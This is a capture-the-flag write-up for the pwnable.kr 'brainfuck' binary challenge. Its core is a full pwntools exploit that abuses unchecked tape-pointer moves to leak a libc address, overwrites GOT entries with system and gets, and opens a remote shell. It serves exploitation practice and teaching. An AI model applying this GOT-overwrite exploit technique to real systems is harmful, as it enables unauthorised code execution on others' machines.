/ pwnable.kr

Pwnable.kr - brainfuck

Challenge

I made a simple brain-fuck language emulation program written in C. 
The [ ] commands are not implemented yet. However the rest functionality seems working fine. 
Find a bug and exploit it to get a shell. 

Download : http://pwnable.kr/bin/bf
Download : http://pwnable.kr/bin/bf_libc.so

Running at : nc pwnable.kr 9001

Analyze

  • Brain**** is a ****ing lovely programming language like Whitespace, with only 8 operations: "<>-+.,[]", it's very interesting though.
  • The point is to overwrite values in got.plt
  • You need to find a way to execute system with parameter(s) to get the shell.

Solution

from pwn import *

DEBUG=0
if DEBUG == 1:
  p=process('./bf')
  libc = ELF('./bf_libc.so')
else:
  p=remote('pwnable.kr', 9001)
  libc = ELF('./bf_libc.so')

a_tape=0x0804a0a0
a_main=0x08048671
a_gotplt_fgets=0x0804a010
a_gotplt_memset=0x0804a02c
a_gotplt_putchar=0x0804a030

global cp
cp = a_tape # current position

def mp(f, t): # move position (change p's value) payload
  global cp
  cp = cp + (t - f)
  if t>f:
    return '>'*(t-f)
  else:
    return '<'*(f-t)

write=',>'*4 + '<'*4
leakandwrite='.>'*4 + '<'*4 + ',>'*4 + '<'*4

payload = mp(cp, a_gotplt_fgets)
payload += leakandwrite
payload += mp(cp, a_gotplt_memset)
payload += write
payload += mp(cp, a_gotplt_putchar)
payload += write
payload += '.'

print p.recvline_startswith('type')
p.sendline(payload)

a_fgets=int(p.recvn(4)[::-1].encode('hex'),16)
a_gets=a_fgets+(libc.symbols['gets'] - libc.symbols['fgets'])
a_system=a_fgets+(libc.symbols['system'] - libc.symbols['fgets'])

p.send(p32(a_system))
p.send(p32(a_gets))
p.send(p32(a_main))
p.sendline('/bin/sh')

p.interactive()
  • Notice: when send addresses in the very last lines, you need to use send() rather than sendline()
  • Also Notice: you can of cause read the 'actual' addresses inside got.plt from the binary you downloaded, but don't use those values cause they will change when the program starts to run. Instead, you should leak their values dynamicly with '.' operation.

References

Pwnable.kr – Rookiss Write-Up

[systemoverlord.com] GOT and PLT for pwning.

[Airs – Ian Lance Taylor] famous blog series about linker and loader

[stackoverflow] python [ : : -1]

Pwnable.kr - brainfuck
Share this